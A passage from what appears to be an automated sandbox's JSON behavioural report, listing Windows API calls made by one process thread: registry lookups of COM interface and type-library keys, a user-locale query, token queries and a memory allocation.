                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 903
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 904
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036e"
              },
              {
                "name": "SubKey",
                "value": "ProxyStubClsid32"
              },
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32"
              }
            ],
            "repeated": 0,
            "id": 905
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "{7C857801-7381-11CF-884D-00AA004B2E24}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 906
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 907
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 908
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 909
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002d8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 910
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 911
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000033c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 912
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 913
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "ProxyStubClsid32"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32"
              }
            ],
            "repeated": 0,
            "id": 914
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "{7C857801-7381-11CF-884D-00AA004B2E24}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 915
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 916
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 917
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 918
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002d8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 919
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 0,
            "id": 920
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000346-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "E085AD58-B839-4625-B40B-4CC546E82D75"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 921
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020119",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom"
              }
            ],
            "repeated": 0,
            "id": 922
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000374"
              }
            ],
            "repeated": 0,
            "id": 923
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "20"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 924
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "18"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 925
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x80\\x9d\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x9e\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 926
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000378"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes"
              }
            ],
            "repeated": 0,
            "id": 927
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000374"
              }
            ],
            "repeated": 0,
            "id": 928
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "TypeLib"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib"
              }
            ],
            "repeated": 0,
            "id": 929
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 930
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}"
              }
            ],
            "repeated": 0,
            "id": 931
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "1.0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0"
              }
            ],
            "repeated": 0,
            "id": 932
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "1.2"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 933
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\"
              }
            ],
            "repeated": 0,
            "id": 934
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "1.2"
              },
              {
                "name": "Handle",
                "value": "0x0000037e"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 935
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "419"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419"
              }
            ],
            "repeated": 0,
            "id": 936
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "19"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19"
              }
            ],
            "repeated": 0,
            "id": 937
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000382"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 938
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "win64"
              },
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 939
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 940
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000382"
              }
            ],
            "repeated": 0,
            "id": 941
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000382"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 942
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000382"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 943
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000382"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 944
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x90\\x96\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x82\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x97\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 945
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 946
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000382"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 947
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000384"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000382"
              },
              {
                "name": "ObjectAttributesName",
                "value": "win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 948
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 949
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 950
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000382"
              }
            ],
            "repeated": 0,
            "id": 951
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              }
            ],
            "repeated": 0,
            "id": 952
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 953
          },
          {
            "timestamp": "2025-11-20 10:58:29,812",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 954
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 955
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000033c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 956
          },
          {
            "timestamp": "2025-11-20 10:58:33,906",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00962000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 957
